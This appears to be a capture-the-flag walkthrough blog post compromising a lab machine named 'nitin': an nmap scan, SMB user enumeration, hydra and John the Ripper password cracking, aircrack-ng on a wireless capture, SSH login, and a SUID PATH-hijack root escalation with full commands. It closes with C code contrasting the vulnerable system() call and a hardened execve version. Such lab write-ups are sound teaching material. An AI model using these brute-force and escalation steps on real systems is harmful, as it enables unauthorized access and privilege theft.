Hack. Sleep. Repeat


Scanning With Nmap

We always start with an nmap scan.

nmap -sC -sV -p- -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Thu Sep 30 15:13:12 2021 as: nmap -sC -sV -p- -oA nmap
Nmap scan report for
Host is up (0.0020s latency).
Not shown: 65531 closed ports
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2525/tcp open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:55:4f:1e:e9:7e:ea:87:69:90:1c:1f:b0:63:3f:f3 (RSA)
|   256 a6:70:f1:0e:df:4e:73:7d:71:42:d6:44:f1:2f:24:d2 (ECDSA)
|_  256 f0:f8:fd:24:65:07:34:c2:d4:9a:1f:c0:b8:2e:d8:3a (ED25519)
Service Info: Host: NITIN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h09m48s, deviation: 3h10m31s, median: 2h59m48s
|_nbstat: NetBIOS name: NITIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: nitin
|   NetBIOS computer name: NITIN\x00
|   Domain name: 168.1.7
|   FQDN: nitin.168.1.7
|_  System time: 2021-09-30T22:43:15+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-30T17:13:15
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
# Nmap done at Thu Sep 30 15:13:26 2021 -- 1 IP address (1 host up) scanned in 14.68 seconds

We have our scan result, and SMB is open, so let's check it.


└─$ smbclient -L  // -N    

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (nitin server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

But there is no share we can access, so let's run enum4linux against the target.


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)

We found some users, so let's try them against SMB, brute forcing the service with hydra.


└─$ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt smb   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2021-09-30 15:20:10
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 43033197 login tries (l:3/p:14344399), ~43033197 tries per task
[DATA] attacking smb://
[445][smb] host:   login: smb
[445][smb] Host: Account: sagar Error: Invalid account (Anonymous success)
[445][smb] Host: Account: blackjax Error: Invalid account (Anonymous success)
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2021-09-30 15:21:01

We have SMB credentials with an empty password; now let's try accessing the share with smbclient, giving both the username and the share name.


Now all the files are on our machine; let's check out the first file, main.txt.


Now let's try unzipping it.


But it seems we need a password, so let's try cracking it with John the Ripper.


Zip file cracked; now let's unzip it with the password we just recovered.


It seems we have a jpg file and a cap file, probably a wireless capture; we can confirm that with Wireshark.




└─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt user.cap 

Cap file cracked, but a password for what? I tried it on the jpg image and got nothing, so I went back to the cap file in Wireshark.


Interesting: the user blackjax. Now let's try the password on SSH.


Boom, we are in and we have user.txt.


sudo -l shows that the user blackjax cannot run sudo, so let's check for SUID binaries.

Privilege Escalation


find / -perm -u=s -type f 2>/dev/null

The unusual SUID binary is /usr/bin/netscan. Interesting; let's check what it does.


Cool, it runs a netstat command; let's run strings on it to confirm.


It seems we can escalate to root through the PATH variable; let's give it a shot.


$ cd /tmp
$ echo "/bin/bash" > netstat
$ chmod 777 netstat
$ export PATH=/tmp:$PATH           
$ echo $PATH
$ /usr/bin/netscan
root@nitin:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(blackjax)
root@nitin:/tmp# cd /root
root@nitin:/root# ls

We are root and done.
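As an added example (not the netscan source from the box, which the post does not show), here is the pattern that makes this PATH hijack work, beside a hardened replacement: the system("netstat -tulpn") body, the /bin/netstat path and the function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Vulnerable pattern (assumed to match netscan): system() spawns a shell
 * that resolves "netstat" through the caller's PATH, so a file named
 * netstat in a directory listed before /bin wins and runs as root. */
int run_netstat_vulnerable(void) {
    return system("netstat -tulpn");
}

/* Hardened pattern: no shell, absolute path only, fixed PATH and a clean
 * environment for the child. Returns the child's exit status, 127 if the
 * exec failed, or -1 if the request is refused or fork/wait failed. */
int run_fixed_path(const char *abs_path, char *const argv[]) {
    if (abs_path == NULL || abs_path[0] != '/' || strstr(abs_path, "..") != NULL)
        return -1;                          /* refuse anything PATH-dependent */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* The inherited environment is dropped; the child sees only this PATH. */
        char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
        execve(abs_path, argv, envp);
        _exit(127);                         /* only reached if exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* /bin/netstat is where net-tools installs it on Ubuntu (assumed). */
    char *const argv[] = { "netstat", "-tulpn", NULL };
    int rc = run_fixed_path("/bin/netstat", argv);
    printf("netstat exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```

With run_fixed_path, prepending /tmp to PATH as in the steps above has no effect, because the binary is named by absolute path and the child never consults the caller's PATH.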


Greetings from Muzec
